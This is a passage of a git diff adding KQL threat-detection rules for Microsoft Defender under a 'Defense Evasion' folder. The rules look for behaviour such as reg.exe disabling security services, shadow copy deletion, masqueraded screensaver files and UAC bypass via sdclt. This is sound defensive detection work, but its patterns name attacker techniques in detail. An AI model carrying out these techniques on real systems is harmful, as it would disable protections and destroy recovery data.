ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot") and (FolderPath endswith "reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/scr_file_write_event.kql b/KQL/rules/Defense Evasion/scr_file_write_event.kql new file mode 100644 index 00000000..b69329c3 --- /dev/null +++ b/KQL/rules/Defense Evasion/scr_file_write_event.kql @@ -0,0 +1,12 @@ +// Title: SCR File Write Event +// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io +// Date: 2022-04-27 +// Level: medium +// Description: Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" for example. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 +// False Positives: +// - The installation of new screen savers by third party software + +DeviceFileEvents +| where FolderPath endswith ".scr" and (not((FolderPath contains ":\\$WINDOWS.~BT\\NewOS\\" or FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\" or FolderPath contains ":\\Windows\\WinSxS\\" or FolderPath contains ":\\WUDownloadCache\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/screensaver_registry_key_set.kql b/KQL/rules/Defense Evasion/screensaver_registry_key_set.kql new file mode 100644 index 00000000..89df8598 --- /dev/null +++ b/KQL/rules/Defense Evasion/screensaver_registry_key_set.kql @@ -0,0 +1,12 @@ +// Title: ScreenSaver Registry Key Set +// Author: Jose Luis Sanchez Martinez (@Joseliyo_Jstnk) +// Date: 2022-05-04 +// Level: medium +// Description: Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 +// False Positives: +// - Legitimate use of screen saver + +DeviceRegistryEvents +| where InitiatingProcessFolderPath endswith "\\rundll32.exe" and (RegistryValueData endswith ".scr" and RegistryKey contains "\\Control Panel\\Desktop\\SCRNSAVE.EXE") and (not((RegistryValueData contains "C:\\Windows\\System32\\" or RegistryValueData contains "C:\\Windows\\SysWOW64\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/scripted_diagnostics_turn_off_check_enabled_registry.kql b/KQL/rules/Defense Evasion/scripted_diagnostics_turn_off_check_enabled_registry.kql new file mode 100644 index 00000000..28cced97 --- /dev/null +++ b/KQL/rules/Defense Evasion/scripted_diagnostics_turn_off_check_enabled_registry.kql @@ -0,0 +1,12 @@ +// Title: Scripted Diagnostics Turn Off Check Enabled - Registry +// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io +// Date: 2022-06-15 +// Level: medium +// Description: Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Administrator actions + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Policies\\Microsoft\\Windows\\ScriptedDiagnostics\\TurnOffCheck" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/scripting_commandline_process_spawned_regsvr32.kql b/KQL/rules/Defense Evasion/scripting_commandline_process_spawned_regsvr32.kql new file mode 100644 index 00000000..e40543bc --- /dev/null +++ b/KQL/rules/Defense Evasion/scripting_commandline_process_spawned_regsvr32.kql @@ -0,0 +1,13 @@ +// Title: Scripting/CommandLine Process Spawned Regsvr32 +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-26 +// Level: medium +// Description: Detects various command line and scripting engines/processes such as "PowerShell", "Wscript", "Cmd", etc. spawning a "regsvr32" instance. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.010 +// False Positives: +// - Legitimate ".bat", ".hta", ".ps1" or ".vbs" scripts leverage legitimately often. Apply additional filter and exclusions as necessary +// - Some legitimate Windows services + +DeviceProcessEvents +| where (FolderPath endswith "\\regsvr32.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")) and (not((ProcessCommandLine endswith " /s C:\\Windows\\System32\\RpcProxy\\RpcProxy.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\cmd.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/sdclt_child_processes.kql b/KQL/rules/Defense Evasion/sdclt_child_processes.kql new file mode 100644 index 00000000..fd5192cf --- /dev/null +++ b/KQL/rules/Defense Evasion/sdclt_child_processes.kql @@ -0,0 +1,10 @@ +// Title: Sdclt Child Processes +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-05-02 +// Level: medium +// Description: A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\sdclt.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/sdiagnhost_calling_suspicious_child_process.kql b/KQL/rules/Defense Evasion/sdiagnhost_calling_suspicious_child_process.kql new file mode 100644 index 00000000..b5db0b02 --- /dev/null +++ b/KQL/rules/Defense Evasion/sdiagnhost_calling_suspicious_child_process.kql @@ -0,0 +1,10 @@ +// Title: Sdiagnhost Calling Suspicious Child Process +// Author: Nextron Systems, @Kostastsale +// Date: 2022-06-01 +// Level: high +// Description: Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036, attack.t1218 + +DeviceProcessEvents +| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\taskkill.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\calc.exe") and InitiatingProcessFolderPath endswith "\\sdiagnhost.exe") and (not(((ProcessCommandLine contains "bits" and FolderPath endswith "\\cmd.exe") or ((ProcessCommandLine endswith "-noprofile -" or ProcessCommandLine endswith "-noprofile") and FolderPath endswith "\\powershell.exe")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/security_service_disabled_via_reg_exe.kql b/KQL/rules/Defense Evasion/security_service_disabled_via_reg_exe.kql new file mode 100644 index 00000000..07766f9a --- /dev/null +++ b/KQL/rules/Defense Evasion/security_service_disabled_via_reg_exe.kql @@ -0,0 +1,12 @@ +// Title: Security Service Disabled Via Reg.EXE +// Author: Florian Roth (Nextron Systems), John Lambert (idea), elhoim +// Date: 2021-07-14 +// Level: high +// Description: Detects execution of "reg.exe" to disable security services such as Windows Defender. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ((ProcessCommandLine contains "\\AppIDSvc" or ProcessCommandLine contains "\\MsMpSvc" or ProcessCommandLine contains "\\NisSrv" or ProcessCommandLine contains "\\SecurityHealthService" or ProcessCommandLine contains "\\Sense" or ProcessCommandLine contains "\\UsoSvc" or ProcessCommandLine contains "\\WdBoot" or ProcessCommandLine contains "\\WdFilter" or ProcessCommandLine contains "\\WdNisDrv" or ProcessCommandLine contains "\\WdNisSvc" or ProcessCommandLine contains "\\WinDefend" or ProcessCommandLine contains "\\wscsvc" or ProcessCommandLine contains "\\wuauserv") and (ProcessCommandLine contains "d 4" and ProcessCommandLine contains "v Start")) and (ProcessCommandLine contains "reg" and ProcessCommandLine contains "add") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql b/KQL/rules/Defense Evasion/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql new file mode 100644 index 00000000..8800d03f --- /dev/null +++ b/KQL/rules/Defense Evasion/self_extracting_package_creation_via_iexpress_exe_from_potentially_suspicious_location.kql @@ -0,0 +1,14 @@ +// Title: Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk, Nasreddine Bencherchali (Nextron Systems) +// Date: 2024-02-05 +// Level: high +// Description: Detects the use of iexpress.exe to create binaries via Self Extraction Directive (SED) files located in potentially suspicious locations. +This behavior has been observed in-the-wild by different threat actors. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Administrators building packages using iexpress.exe + +DeviceProcessEvents +| where (ProcessCommandLine contains " -n " or ProcessCommandLine contains " /n " or ProcessCommandLine contains " –n " or ProcessCommandLine contains " —n " or ProcessCommandLine contains " ―n ") and (FolderPath endswith "\\iexpress.exe" or ProcessVersionInfoOriginalFileName =~ "IEXPRESS.exe") and (ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/self_extraction_directive_file_created_in_potentially_suspicious_location.kql b/KQL/rules/Defense Evasion/self_extraction_directive_file_created_in_potentially_suspicious_location.kql new file mode 100644 index 00000000..6cb1c1f4 --- /dev/null +++ b/KQL/rules/Defense Evasion/self_extraction_directive_file_created_in_potentially_suspicious_location.kql @@ -0,0 +1,13 @@ +// Title: Self Extraction Directive File Created In Potentially Suspicious Location +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2024-02-05 +// Level: medium +// Description: Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location. +These files are used by the "iexpress.exe" utility in order to create self extracting packages. +Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceFileEvents +| where (FolderPath contains ":\\ProgramData\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Windows\\System32\\Tasks\\" or FolderPath contains ":\\Windows\\Tasks\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains "\\AppData\\Local\\Temp\\") and FolderPath endswith ".sed" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/service_registry_key_deleted_via_reg_exe.kql b/KQL/rules/Defense Evasion/service_registry_key_deleted_via_reg_exe.kql new file mode 100644 index 00000000..e401310f --- /dev/null +++ b/KQL/rules/Defense Evasion/service_registry_key_deleted_via_reg_exe.kql @@ -0,0 +1,12 @@ +// Title: Service Registry Key Deleted Via Reg.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-01 +// Level: high +// Description: Detects execution of "reg.exe" commands with the "delete" flag on services registry key. Often used by attacker to remove AV software services +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains " delete " and (FolderPath endswith "reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\services\\" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/set_suspicious_files_as_system_files_using_attrib_exe.kql b/KQL/rules/Defense Evasion/set_suspicious_files_as_system_files_using_attrib_exe.kql new file mode 100644 index 00000000..681835b2 --- /dev/null +++ b/KQL/rules/Defense Evasion/set_suspicious_files_as_system_files_using_attrib_exe.kql @@ -0,0 +1,11 @@ +// Title: Set Suspicious Files as System Files Using Attrib.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-28 +// Level: high +// Description: Detects the usage of attrib with the "+s" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains " +s" and (ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".hta" or ProcessCommandLine contains ".ps1" or ProcessCommandLine contains ".vbe" or ProcessCommandLine contains ".vbs") and (FolderPath endswith "\\attrib.exe" or ProcessVersionInfoOriginalFileName =~ "ATTRIB.EXE") and (ProcessCommandLine contains " %" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "\\ProgramData\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Windows\\Temp\\")) and (not((ProcessCommandLine contains "\\Windows\\TEMP\\" and ProcessCommandLine contains ".exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/setuid_and_setgid.kql b/KQL/rules/Defense Evasion/setuid_and_setgid.kql new file mode 100644 index 00000000..f7065aab --- /dev/null +++ b/KQL/rules/Defense Evasion/setuid_and_setgid.kql @@ -0,0 +1,12 @@ +// Title: Setuid and Setgid +// Author: Ömer Günal +// Date: 2020-06-16 +// Level: low +// Description: Detects suspicious change of file privileges with chown and chmod commands +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1548.001 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where (ProcessCommandLine contains " chmod u+s" or ProcessCommandLine contains " chmod g+s") and ProcessCommandLine contains "chown root" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/shadow_copies_deletion_using_operating_systems_utilities.kql b/KQL/rules/Defense Evasion/shadow_copies_deletion_using_operating_systems_utilities.kql new file mode 100644 index 00000000..803df803 --- /dev/null +++ b/KQL/rules/Defense Evasion/shadow_copies_deletion_using_operating_systems_utilities.kql @@ -0,0 +1,13 @@ +// Title: Shadow Copies Deletion Using Operating Systems Utilities +// Author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades) +// Date: 2019-10-22 +// Level: high +// Description: Shadow Copies deletion using operating systems utilities +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.impact, attack.t1070, attack.t1490 +// False Positives: +// - Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason +// - LANDesk LDClient Ivanti-PSModule (PS EncodedCommand) + +DeviceProcessEvents +| where ((ProcessCommandLine contains "shadow" and ProcessCommandLine contains "delete") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\vssadmin.exe" or FolderPath endswith "\\diskshadow.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll", "wmic.exe", "VSSADMIN.EXE", "diskshadow.exe")))) or ((ProcessCommandLine contains "delete" and ProcessCommandLine contains "catalog" and ProcessCommandLine contains "quiet") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")) or (((ProcessCommandLine contains "unbounded" or ProcessCommandLine contains "/MaxSize=") and (ProcessCommandLine contains "resize" and ProcessCommandLine contains "shadowstorage")) and (FolderPath endswith "\\vssadmin.exe" or ProcessVersionInfoOriginalFileName =~ "VSSADMIN.EXE")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/shell32_dll_execution_in_suspicious_directory.kql b/KQL/rules/Defense Evasion/shell32_dll_execution_in_suspicious_directory.kql new file mode 100644 index 00000000..a39bfd86 --- /dev/null +++ b/KQL/rules/Defense Evasion/shell32_dll_execution_in_suspicious_directory.kql @@ -0,0 +1,10 @@ +// Title: Shell32 DLL Execution in Suspicious Directory +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-11-24 +// Level: high +// Description: Detects shell32.dll executing a DLL in a suspicious directory +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218.011 + +DeviceProcessEvents +| where ((ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%LocalAppData%" or ProcessCommandLine contains "%Temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "\\Temp\\" or ProcessCommandLine contains "\\Users\\Public\\") and (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "Control_RunDLL")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/space_after_filename_macos.kql b/KQL/rules/Defense Evasion/space_after_filename_macos.kql new file mode 100644 index 00000000..7bc2ca3c --- /dev/null +++ b/KQL/rules/Defense Evasion/space_after_filename_macos.kql @@ -0,0 +1,12 @@ +// Title: Space After Filename - macOS +// Author: remotephone +// Date: 2021-11-20 +// Level: low +// Description: Detects attempts to masquerade as legitimate files by adding a space to the end of the filename. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.006 +// False Positives: +// - Mistyped commands or legitimate binaries named to match the pattern + +DeviceProcessEvents +| where ProcessCommandLine endswith " " or FolderPath endswith " " \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/start_of_nt_virtual_dos_machine.kql b/KQL/rules/Defense Evasion/start_of_nt_virtual_dos_machine.kql new file mode 100644 index 00000000..3df69197 --- /dev/null +++ b/KQL/rules/Defense Evasion/start_of_nt_virtual_dos_machine.kql @@ -0,0 +1,12 @@ +// Title: Start of NT Virtual DOS Machine +// Author: frack113 +// Date: 2022-07-16 +// Level: medium +// Description: Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Legitimate use + +DeviceProcessEvents +| where FolderPath endswith "\\ntvdm.exe" or FolderPath endswith "\\csrstub.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspect_svchost_activity.kql b/KQL/rules/Defense Evasion/suspect_svchost_activity.kql new file mode 100644 index 00000000..79d7382e --- /dev/null +++ b/KQL/rules/Defense Evasion/suspect_svchost_activity.kql @@ -0,0 +1,12 @@ +// Title: Suspect Svchost Activity +// Author: David Burkett, @signalblur +// Date: 2019-12-28 +// Level: high +// Description: It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055 +// False Positives: +// - Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf + +DeviceProcessEvents +| where (ProcessCommandLine endswith "svchost.exe" and FolderPath endswith "\\svchost.exe") and (not(((InitiatingProcessFolderPath endswith "\\rpcnet.exe" or InitiatingProcessFolderPath endswith "\\rpcnetp.exe") or isnull(ProcessCommandLine)))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_advpack_call_via_rundll32_exe.kql b/KQL/rules/Defense Evasion/suspicious_advpack_call_via_rundll32_exe.kql new file mode 100644 index 00000000..2fcd7b4d --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_advpack_call_via_rundll32_exe.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Advpack Call Via Rundll32.EXE +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-17 +// Level: high +// Description: Detects execution of "rundll32" calling "advpack.dll" with potential obfuscated ordinal calls in order to leverage the "RegisterOCX" function +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "advpack" and ((ProcessCommandLine contains "#+" and ProcessCommandLine contains "12") or ProcessCommandLine contains "#-") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_agentexecutor_powershell_execution.kql b/KQL/rules/Defense Evasion/suspicious_agentexecutor_powershell_execution.kql new file mode 100644 index 00000000..14fcb2bd --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_agentexecutor_powershell_execution.kql @@ -0,0 +1,10 @@ +// Title: Suspicious AgentExecutor PowerShell Execution +// Author: Nasreddine Bencherchali (Nextron Systems), memory-shards +// Date: 2022-12-24 +// Level: high +// Description: Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents +| where ((ProcessCommandLine contains " -powershell" or ProcessCommandLine contains " -remediationScript") and (FolderPath endswith "\\AgentExecutor.exe" or ProcessVersionInfoOriginalFileName =~ "AgentExecutor.exe")) and (not((InitiatingProcessFolderPath endswith "\\Microsoft.Management.Services.IntuneWindowsAgent.exe" or (ProcessCommandLine contains "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" or ProcessCommandLine contains "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_application_allowed_through_exploit_guard.kql b/KQL/rules/Defense Evasion/suspicious_application_allowed_through_exploit_guard.kql new file mode 100644 index 00000000..1e09ffa9 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_application_allowed_through_exploit_guard.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Application Allowed Through Exploit Guard +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-05 +// Level: high +// Description: Detects applications being added to the "allowed applications" list of exploit guard in order to bypass controlled folder settings +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where RegistryKey contains "SOFTWARE\\Microsoft\\Windows Defender\\Windows Defender Exploit Guard\\Controlled Folder Access\\AllowedApplications" and (RegistryKey endswith "\\Users\\Public*" or RegistryKey endswith "\\AppData\\Local\\Temp*" or RegistryKey endswith "\\Desktop*" or RegistryKey endswith "\\PerfLogs*" or RegistryKey endswith "\\Windows\\Temp*") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_bitlocker_access_agent_update_utility_execution.kql b/KQL/rules/Defense Evasion/suspicious_bitlocker_access_agent_update_utility_execution.kql new file mode 100644 index 00000000..67e98b86 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_bitlocker_access_agent_update_utility_execution.kql @@ -0,0 +1,12 @@ +// Title: Suspicious BitLocker Access Agent Update Utility Execution +// Author: andrewdanis, Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-10-18 +// Level: high +// Description: Detects the execution of the BitLocker Access Agent Update Utility (baaupdate.exe) which is not a common parent process for other processes. +Suspicious child processes spawned by baaupdate.exe could indicate an attempt at lateral movement via BitLocker DCOM & COM Hijacking. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.lateral-movement, attack.t1021.003 + +DeviceProcessEvents +| where (FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\baaupdate.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_cabinet_file_execution_via_msdt_exe.kql b/KQL/rules/Defense Evasion/suspicious_cabinet_file_execution_via_msdt_exe.kql new file mode 100644 index 00000000..bad7a535 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_cabinet_file_execution_via_msdt_exe.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Cabinet File Execution Via Msdt.EXE +// Author: Nasreddine Bencherchali (Nextron Systems), GossiTheDog, frack113 +// Date: 2022-06-21 +// Level: medium +// Description: Detects execution of msdt.exe using the "cab" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190 +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1202 +// False Positives: +// - Legitimate usage of ".diagcab" files + +DeviceProcessEvents +| where (ProcessCommandLine contains " -cab " or ProcessCommandLine contains " /cab " or ProcessCommandLine contains " –cab " or ProcessCommandLine contains " —cab " or ProcessCommandLine contains " ―cab ") and (FolderPath endswith "\\msdt.exe" or ProcessVersionInfoOriginalFileName =~ "msdt.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_calculator_usage.kql b/KQL/rules/Defense Evasion/suspicious_calculator_usage.kql new file mode 100644 index 00000000..506c97ea --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_calculator_usage.kql @@ -0,0 +1,11 @@ +// Title: Suspicious Calculator Usage +// Author: Florian Roth (Nextron Systems) +// Date: 2019-02-09 +// Level: high +// Description: Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 + +DeviceProcessEvents +| where ProcessCommandLine contains "\\calc.exe " or (FolderPath endswith "\\calc.exe" and (not((FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\" or FolderPath contains ":\\Windows\\WinSxS\\")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_child_process_created_as_system.kql b/KQL/rules/Defense Evasion/suspicious_child_process_created_as_system.kql new file mode 100644 index 00000000..884bc1cc --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_child_process_created_as_system.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Child Process Created as System +// Author: Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR) +// Date: 2019-10-26 +// Level: high +// Description: Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1134.002 + +DeviceProcessEvents +| where ((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI") and ((InitiatingProcessAccountName =~ "NETWORK SERVICE" and InitiatingProcessAccountDomain startswith "") or (InitiatingProcessAccountName =~ "LOCAL SERVICE" and InitiatingProcessAccountDomain startswith "")) and (AccountName contains "AUTHORI" or AccountName contains "AUTORI") and ((AccountName =~ "SYSTEM" and AccountDomain startswith "") or (AccountName =~ "Système" and AccountDomain startswith "") or (AccountName =~ "СИСТЕМА" and AccountDomain startswith ""))) and (not((ProcessCommandLine contains "DavSetCookie" and FolderPath endswith "\\rundll32.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_child_process_of_aspnetcompiler.kql b/KQL/rules/Defense Evasion/suspicious_child_process_of_aspnetcompiler.kql new file mode 100644 index 00000000..db1a868c --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_child_process_of_aspnetcompiler.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Child Process of AspNetCompiler +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-14 +// Level: high +// Description: Detects potentially suspicious child processes of "aspnet_compiler.exe". +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1127 + +DeviceProcessEvents +| where ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\notepad.exe") or (FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\AppData\\Local\\Roaming\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\Windows\\System32\\Tasks\\" or FolderPath contains ":\\Windows\\Tasks\\")) and InitiatingProcessFolderPath endswith "\\aspnet_compiler.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_child_process_of_wermgr_exe.kql b/KQL/rules/Defense Evasion/suspicious_child_process_of_wermgr_exe.kql new file mode 100644 index 00000000..252212e7 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_child_process_of_wermgr_exe.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Child Process Of Wermgr.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2022-10-14 +// Level: high +// Description: Detects suspicious Windows Error Reporting manager (wermgr.exe) child process +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1055, attack.t1036 + +DeviceProcessEvents +| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nslookup.exe" or FolderPath endswith 